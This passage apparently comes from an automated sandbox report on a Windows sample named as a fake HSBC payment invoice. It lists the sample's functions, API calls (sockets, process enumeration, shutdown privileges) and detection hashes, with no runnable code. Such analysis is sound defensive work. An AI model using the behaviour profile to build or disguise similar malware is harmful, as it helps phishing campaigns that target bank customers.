                    • Opcode Fuzzy Hash: 3236be4eaedf2df28df0fa13d9bdab6b17ea822f5d0dadb5317762e8e06fe479
                    • Instruction Fuzzy Hash: 8941907191024E9FCF21EF65CC85AEEBBB4FF05314F145566E819B21A0EB309E44CB90
                    Function 00F0D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetSystemMetrics.USER32(0000000F), ref: 00F0D78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00F0D7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F0D9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F0DA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F0DA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00F0DA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0DA68
                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F0DA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                    • String ID:
                    • API String ID: 830902736-0
                    • Opcode ID: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                    • Instruction ID: 51639e4566f729c2a027cc1b446f715b02dd0115b0e01ae80c319afbba017f78
                    • Opcode Fuzzy Hash: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                    • Instruction Fuzzy Hash: 63B19A75A00229EFDF14CFA8C9857BE7BB1FF44711F088069EC489B296D734A950EB50
                    Function 00E958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 2e3263f94981bb8123e7efa0ab88d03203daa0b6de794b422ebc84e02267bd64
                    • Instruction ID: 846295bf83007c9bba8f6abfd9f0893a974e748492d86db98fd4f5e599d7fd5a
                    • Opcode Fuzzy Hash: 2e3263f94981bb8123e7efa0ab88d03203daa0b6de794b422ebc84e02267bd64
                    • Instruction Fuzzy Hash: 42128971A00609EFDF14DFA4D981AEEB3F5FF48300F14956AE84AB7291EB35A911CB50
                    Function 00F0C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • ReleaseCapture.USER32 ref: 00F0C2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00F0C39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F0C3AD
                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F0C48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 973565025-2107944366
                    • Opcode ID: e7ee0ff05c748561ba5bd1a09091238706f5b05a69b590bf759c68c8de00659a
                    • Instruction ID: 782e2b259bb9726649a1adea7b9ff8f4f69f0cbe12c0de930b767c448534f95e
                    • Opcode Fuzzy Hash: e7ee0ff05c748561ba5bd1a09091238706f5b05a69b590bf759c68c8de00659a
                    • Instruction Fuzzy Hash: E3519A74604304AFD714EF20CC95F6A7BE0FB89310F00462DF9999B2E2CB70A949EB52
                    Function 00EE545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                      • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                      • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00EE549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                    • Instruction ID: d82d90393b85d6e96d08e0aab0602027ccb748e40f52524d618451aae6817b0e
                    • Opcode Fuzzy Hash: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                    • Instruction Fuzzy Hash: 1F014733654A5D6AF7385276DC4ABBA7258EB0175AF242022FC27F20C3EA500C808291
                    Function 00E93190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    • API String ID: 674341424-3945284152
                    • Opcode ID: bc3af60a7184cd0379505c2ee0960dde2454d3b6feef0dc0a868685caf5e8692
                    • Instruction ID: b86bb3de36ce5fe042220aefe44d7892c1b86414217fa233baf41e40105fdcf1
                    • Opcode Fuzzy Hash: bc3af60a7184cd0379505c2ee0960dde2454d3b6feef0dc0a868685caf5e8692
                    • Instruction Fuzzy Hash: 59229E715083019FCB24DF24C881BAFB7E5AF88704F14591DF89AA7292DB71EE05CB92
                    Function 00EF6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF65EF
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF65FE
                    • bind.WS2_32(00000000,?,00000010), ref: 00EF661A
                    • listen.WS2_32(00000000,00000005), ref: 00EF6629
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6643
                    • closesocket.WS2_32(00000000), ref: 00EF6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                    • Instruction ID: 4ff7aba5d7bd49bb2504ef7cc8e1818ada7f3d0c34d9e83e893f35d65b9bddd0
                    • Opcode Fuzzy Hash: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                    • Instruction Fuzzy Hash: 842159316002089FCB10AF64CC85B7AB7E9EF48724F159169EA5AF72D2CB70AD059B51
                    Function 00E81287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00E819FA
                    • GetSysColor.USER32(0000000F), ref: 00E81A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E81A61
                      • Part of subcall function 00E81290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ColorDialogNtdllProc_$LongWindow
                    • String ID:
                    • API String ID: 591255283-0
                    • Opcode ID: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                    • Instruction ID: 4ff70c277bef3453c546c28690e2d9c2e1a451972d94988262c28d8bdefea839
                    • Opcode Fuzzy Hash: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                    • Instruction Fuzzy Hash: 87A11771105588FAD62CBB28DC95DFB399CDB82349B14229EF40EF61D2DA548D03A3B2
                    Function 00EF6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • socket.WS2_32(00000002,00000002,00000011), ref: 00EF6AB1
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6ADA
                    • bind.WS2_32(00000000,?,00000010), ref: 00EF6B13
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6B20
                    • closesocket.WS2_32(00000000), ref: 00EF6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: f8f6d93ca87c88bf952a95617b1b023119175d323d4a7d4ac11d10887893329c
                    • Instruction ID: 89a31da116a35dceefd4b3d06fbfda795def3d883fc95bf70c42d1debfbf334d
                    • Opcode Fuzzy Hash: f8f6d93ca87c88bf952a95617b1b023119175d323d4a7d4ac11d10887893329c
                    • Instruction Fuzzy Hash: 3941AF75A40214AFEB10BF64DC86F7E77E8AB48720F449058FA5EBB2D3DA709D018791
                    Function 00F055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                    • Instruction ID: 42768388e79cf5278e597434aac8dab01ce9a80fd11b02404b63ee2953373951
                    • Opcode Fuzzy Hash: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                    • Instruction Fuzzy Hash: 0811C432B009146FEB316F26DC44B2F779CFF84B21B444429F80AD7281CBB19901EEA5
                    Function 00EFF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EFF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EFF15F
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00EFF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EFF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: caca82f4290fbf6a9e8635653191da805c6163ce2a20b234376a1c0cd4fd3f4b
                    • Instruction ID: 8c2119b2cf4886b11e05c0f2c26af28078c77b2b859996fdd8185c6d083b89db
                    • Opcode Fuzzy Hash: caca82f4290fbf6a9e8635653191da805c6163ce2a20b234376a1c0cd4fd3f4b
                    • Instruction Fuzzy Hash: C0516E715043059FD314EF20DC85A6BB7E8FF98710F54582DF59AA72A2EB70E908CB92
                    Function 00F0C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetCursorPos.USER32(?), ref: 00F0C7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EBBBFB,?,?,?,?,?), ref: 00F0C7D7
                    • GetCursorPos.USER32(?), ref: 00F0C824
                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EBBBFB,?,?,?), ref: 00F0C85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                    • String ID:
                    • API String ID: 1423138444-0
                    • Opcode ID: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                    • Instruction ID: 6371b93bf638c5091be895eb6eacc32caaeddaebca20c331e3f4f5c0a2feb8de
                    • Opcode Fuzzy Hash: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                    • Instruction Fuzzy Hash: 0B318135500018AFCB25CF58C898EEA7BF6EB0A320F044169F905872A1D7315950FBA4
                    Function 00EE40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE40D1
                    • _memset.LIBCMT ref: 00EE40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE4144
                    • CloseHandle.KERNEL32(00000000), ref: 00EE414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                    • Instruction ID: 0e61f776d0e3d78d9406a077d06948681a666108a6a5307a144b9754009d1b26
                    • Opcode Fuzzy Hash: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                    • Instruction Fuzzy Hash: C011AB7590122C7AD7309BA5AC4DFABBB7CEF45764F1041A6F908E7180D6744E848BA4
                    Function 00E81290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                    • GetClientRect.USER32(?,?), ref: 00EBB84B
                    • GetCursorPos.USER32(?), ref: 00EBB855
                    • ScreenToClient.USER32(?,?), ref: 00EBB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                    • String ID:
                    • API String ID: 1010295502-0
                    • Opcode ID: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                    • Instruction ID: f9caeaedd3ad5a3fe00a36f58569050d5813179691cb806e8b0e0df135a1f669
                    • Opcode Fuzzy Hash: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                    • Instruction Fuzzy Hash: A4113635A0011DAFCB10EFA8D8859FE77BCFB05310F000496FA09E7261D730BA56ABA5
                    Function 00EDEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EDEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: e919ad48cc4f62e73f07ffb8b8fbe335239c79ae1823fb27f2942b7dd7b6bc27
                    • Instruction ID: 2cc4d626cbd1ff49bf5ecb817adbf18b96876471cbe230e66dd6d722dd2b69c9
                    • Opcode Fuzzy Hash: e919ad48cc4f62e73f07ffb8b8fbe335239c79ae1823fb27f2942b7dd7b6bc27
                    • Instruction Fuzzy Hash: A0323675A007059FC728DF19C485AAAB7F1FF48320B15D56EE89AEB3A1D770E942CB40
                    Function 00EF25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
